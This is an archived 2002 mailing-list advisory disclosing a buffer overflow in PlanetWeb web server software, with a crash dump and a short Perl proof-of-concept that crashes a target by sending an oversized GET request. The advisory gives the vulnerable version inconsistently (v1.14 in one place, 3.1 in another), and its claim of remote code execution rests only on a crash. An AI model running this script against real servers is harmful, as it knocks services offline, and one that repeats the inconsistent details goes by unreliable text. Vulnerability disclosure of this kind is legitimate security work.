Planet Web Software Buffer Overflow

From: UkR security team™ (cuctemaat_private)
Date: Sat Sep 14 2002 - 14:38:35 PDT

Next message: Zeux: "Bug in Opera and Konqueror"

Previous message: Steven M. Bellovin: "Re: Bypassing SMTP Content Protection with a Flick of a Button"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

:UkR security team presents:

Release Date:  September 14, 2002
Product     :  PlanetWeb Software v1.14 and earlier 
versions
Vendor      :  PlanetDNS (http://www.planetdns.net)
Type        :  Buffer Overflow
Author      :  UkR-XblP (cuctemaat_private)
Platforms   :  Microsoft Windows Variants 

About PlanetWeb:
PlanetWeb is a complete commercial software package that 
provides you with 
everything you need to run your own website directly from 
your computer. 
It includes our lightening fast web server with integrated 
PHP support,
so you can create sophisticated web pages without doing 
any configuration! 

Overview:
A buffer overflow exists in versions 3.1 and previous of 
PlanetWeb Software.
Exploitation of this vulnerability allows remote execution 
of arbitrary code 
with daemon privileges.

Detailed Description:
Sending a GET request containing a URL of approximately 
1024 characters or more
causes Planet Web Server to crash. Exploitation is 
possible and proof of concept
code has been authored to demonstrate this problem.

Result:
PDNSC caused an invalid page fault in
module KERNEL32.DLL at 0167:bff9db61.
Registers:
EAX=c00309c4 CS=0167 EIP=bff9db61 EFLGS=00010216
EBX=ffffffff SS=016f ESP=0214fde8 EBP=02150084
ECX=00000000 DS=016f ESI=81770a14 FS=4217
EDX=bff76855 ES=016f EDI=02150120 GS=0000
Bytes at CS:EIP:
53 8b 15 e4 9c fc bf 56 89 4d e4 57 89 4d dc 89 
Stack dump:

Solution:
Disable the Planet Web Server until a patch is made 
available by the vendor.

----------------- exploit - cut here -----------------

#!/usr/bin/perl
# PlanetWeb Software perl exploit
# by UkR-XblP / UkR security team
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 vulnurable_server 
..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                  PeerAddr  => $host,
                                  PeerPort  => "http(80)",
                                  );
unless ($remote) { die "cannot connect to http daemon on 
$host" }
$xblp = "A" x 1024;
$exploit = "GET /".$xblp." HTTP/1.0\n\n";
$remote->autoflush(1);
print $remote $exploit;
close $remote;

----------------- exploit - cut here -----------------
---
Professional hosting for everyone - http://www.host.ru

Next message: Zeux: "Bug in Opera and Konqueror"
Previous message: Steven M. Bellovin: "Re: Bypassing SMTP Content Protection with a Flick of a Button"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 17 2002 - 09:17:10 PDT